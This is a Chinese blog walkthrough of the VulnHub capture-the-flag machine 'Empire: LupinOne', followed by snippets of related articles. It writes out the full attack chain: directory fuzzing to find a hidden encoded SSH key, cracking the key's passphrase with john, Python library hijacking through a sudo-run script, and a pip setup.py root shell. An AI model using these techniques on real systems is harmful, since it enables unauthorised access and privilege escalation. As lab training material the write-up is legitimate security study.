VulnHub日记(十六):Empire: LupinOne

最新推荐文章于 2024-03-02 10:13:30 发布
最新推荐文章于 2024-03-02 10:13:30 发布
阅读量3.8k 收藏 2
点赞数
分类专栏: VlunHub日记 文章标签: web安全 linux ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44107836/article/details/121582380
版权

参考链接

Vulnhub:Empire: LupinOne
参考博客

开始练习

本机ip:192.168.56.102
目的机ip:192.168.56.138
发现主机,nmap扫描

fping -aqg 192.168.56.0/24
nmap -A 192.168.56.138

在这里插入图片描述

访问http页面,同时目录枚举

 dirsearch -u 192.168.56.138 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e php,html,txt,zip,bak

在这里插入图片描述
在nmap扫到的robots.txt中,不允许访问~myfiles 文件,于是fuzz类似文件名,发现~secret文件夹

ffuf -c -r -u 'http://192.168.56.138/~FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -fs 0

在这里插入图片描述
访问,是一段文字,内容为在该目录下有ssh私钥文件,需要继续枚举,由于私钥文件一般是在.ssh文件夹下,所以按照".FUZZ"的思路枚举,又由于是私钥文件,需要考虑添加后缀

ffuf -c -r -u 'http://192.168.56.138/~secret/.FUZZ' -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt,.html -fs 0

在这里插入图片描述
在这里插入图片描述
查看该文件

http://192.168.56.138/~secret/.mysecret.txt

在这里插入图片描述
明显不是明文私钥,需要解密,这里用到在线解密dcode.fr
在这里插入图片描述
base58编码概率大,使用该方式分析,获得私钥明文,保存到本地文件,我创建的文件名为id_rsa
在这里插入图片描述
之后使用ssh2john爆破私钥密码

/ssh2john.py id_rsa | tee hash
john hash --wordlist=rockyou.txt 
#这里没有想到/~secrets/里的提示,字典选的不对,应该选提示里说到的fasttrack.txt
john hash --wordlist=/usr/share/wordlists/fasttrack.txt

在这里插入图片描述
登陆成功,拿到userFLAG
在这里插入图片描述
看有没有特殊权限命令

sudo -l

在这里插入图片描述
arsene用户免密root执行heist.py ,看完文件,发现没有其余信息,只能从这个py文件入手,查看该文件,调用了一个webbrowser库
在这里插入图片描述
查找这个库,或者查找可编辑文件

find / -writable ! -path '/proc*' ! -path '/sys*' ! -path '/dev*' -exec ls -al {} \; 2>/dev/null

在这里插入图片描述
编辑webbrowser.py,利用该文件获取arsene的shell

echo import os >webbrowser.py
echo os.system("/bin/bash")>>webbrowser.py
#或者弹一个shell到本机也可以

在这里插入图片描述

sudo -u arsene /usr/bin/python 3.9 /home/arsene/heist.py

在这里插入图片描述

sudo -l

在这里插入图片描述
pip提权利用

TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF

在这里插入图片描述
拿到root FLAG
在这里插入图片描述

Dawn_Xiiii
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
靶机渗透练习41-Empire Lupin One
hirak0的博客
04-18 1万+
靶机描述 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ Description Difficulty: Medium This box was created to be medium, but it can be hard if you get lost. CTF like box. You have to enumerate as much as you can. For hints discord Server ( https://d
VulnHub-Empire_ LupinOne靶机详细渗透过程
MRS_jianai的博客
12-28 1194
VulnHub-Empire: LupinOne靶机详细渗透过程
靶机11 Empire Lupin One
honest_gg的博客
10-09 1856
本靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权
EMPIRE: LUPINONE实战演练
龙狼刺的博客
05-30 909
Empire:LupinOne
靶机渗透日记
Anonymous
01-17 1218
IP为 端口 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0) 80/tcp open http Apache httpd 2.4.48 ((Debian)) 访问 80 端口是一张图片,接下来目录扫描 [23:08:42] 301 - 312B - /image -> http://192.168.1.64/image/ ..
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
Sleight:Empire HTTP(S)C2重定向器设置脚本
05-02
输入您的Empire C2的IP地址和监听端口。 对HTTPS提示符说不。 输入一个站点以将所有无效请求重定向到。 启动Empire HTTP侦听器,并将“主机”属性设置为重定向器的域。HTTP重定向器参考: 2)设置HTTPS重定向器: ...
Starkiller:Starkiller是PowerShell Empire的前端
03-20
星际杀手 Starkiller是的前端。它是用VueJS编写的Electron应用程序。如果您想贡献,请遵循。如果您想请求功能或报告错误,请按照。 赞助商 入门 要运行Starkiller,可以在“页面上下载Mac,Linux和Windows的安装程序...
Empire:一个基于Docker和亚马逊ECS的自托管PaaS
02-26
但当我们不断壮大,问题和瓶颈频现,为此我们开始寻求解决之道,首先关注的是开源社区中支持Docker的平台,如Flynn、Deis、CoreOS、Kubernetes等,但都不理想,后通过使用亚马逊ECS,最后确定了Empire,用Empire完成...
靶机实战(1):Empire LupinOne
OneMoreThink
12-08 194
01、靶机名称:Empire: LupinOne02、靶机网址:https://www.vulnhub.com/entry/empire-lupinone,750/03、参考文章:大余每日一攻防EMPIRE: LUPINONE(七)04、文章目录:主机发现端口发现(服务、组件)漏洞发现(获取权限)22端口/ssh服务组件漏洞弱口令漏洞80端口/http服务组件漏洞URL发现(目录、文件)22端口/...
vulnhub靶机渗透 Lupin-One
RestoreJustice的博客
03-19 161
下载地址:https://www.vulnhub.com/entry/empire-lupinone,750/​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里连接到虚拟网卡1。
vulnhub-Empire: LupinOne
qq_43006864的博客
05-05 2167
Empire: LupinOne ~ VulnHub 靶机:EMPIRE: LUPINONE 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux 信息收集: 这里vmbox直接现实了地址,就不做网段扫描了。直接扫描目标网站的详细端口信息。 map -sS -sV -A -p- 192.168.1.109 目标网站: 22/80端口 r.
lupinone靶机渗透
最新发布
m0_69354472的博客
03-02 857
[2.nessus扫描工具使用]][[2.awvs扫描工具使用]][[2.appscan扫描工具安装与使用]]
01-Empire-Lupin-One vulnhub靶场(ssh2john)
weixin_62621015的博客
03-18 320
01-Empire-Lupin-One vulnhub靶场详细通关记录
Vulnhub之Empire: LupinOne
weixin_64112307的博客
05-08 2266
前期准备: 靶机地址: https://www.vulnhub.com/entry/empire-lupinone,750/ kali机IP:192.168.132.129 靶机IP:192.168.132.128 运行环境:VMware 一、信息收集: 使用nmap进行对靶机进行扫描 nmap -sC -sV 192.168.132.128 -p- -n -vv -min-rate=2000 发现了22与80端口,在80端口下发现robots.txt和~myfiles 利用80端.
打靶知识点梳理+Empire: LupinOne打靶
maple_leaf
10-05 147
本文不仅仅是Empire: LupinOne靶场的wp,而是对打靶的一个总结归纳,本文有以下特点: 1. 系统的梳理渗透的流程 2. 系统性归纳打靶遇到的问题,包括常见提权方式的整理等 3. 对常见工具/脚本的使用,和对使用到的每个参数的解释 4. 详细解释每个步骤的作用,帮助进行打靶知识的梳理
VulnHub靶场LupinOne
I夜白
02-01 4977
VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息收集 信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重
VulnHub-01 - Empire Lupin One打靶记录
qq_43534481的博客
08-30 1112
VulnHub-01 - Empire Lupin One 详细 解题思路
01 - Empire Lupin One
bobo_milk的博客
05-21 725
目录 一、信息收集 二、漏洞发现 三、权限提升 总结 一、信息收集 常规的主机发现以及端口扫描,扫描自己所在的网段。 nmap 192.168.216.0/24 nmap -A -v -T4 -p 1-65535 192.168.216.151 可以看到服务器开启了80端口,和22端口,22端口只能用来爆破,因此先查看一下80端口。 二、漏洞发现 访问80端口 没奇怪的地方,源代码也没有提示。 对网站进行目录扫...
通过list<Empire*>::iterator访问Empire的成员
06-11
可以通过迭代器(*iterator)来访问Empire的成员,然后使用成员访问运算符(.)或箭头运算符(->)来访问Empire的成员变量或成员函数。 以下是一个示例代码: ```c++ #include <iostream> #include <list> using namespace std; class Empire { public: Empire(int id, const QString& name) : m_id(id), m_name(name) {} void printInfo() { cout << "Empire ID: " << m_id << ", Name: " << m_name.toStdString() << endl; } private: int m_id; QString m_name; }; int main() { list<Empire*> empireList; empireList.push_back(new Empire(1, "Empire 1")); empireList.push_back(new Empire(2, "Empire 2")); // 使用迭代器访问Empire的成员 for (list<Empire*>::iterator it = empireList.begin(); it != empireList.end(); ++it) { // 访问Empire的成员变量 cout << "Empire ID: " << (*it)->m_id << ", Name: " << (*it)->m_name.toStdString() << endl; // 调用Empire的成员函数 (*it)->printInfo(); } // 释放内存 for (list<Empire*>::iterator it = empireList.begin(); it != empireList.end(); ++it) { delete *it; } empireList.clear(); return 0; } ``` 以上代码创建了一个Empire指针的列表,然后使用迭代器访问列表中的Empire对象。在迭代器访问Empire指针时,需要使用箭头运算符(->)来访问Empire对象的成员变量和成员函数。注意要遍历完列表后,释放Empire对象的内存。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值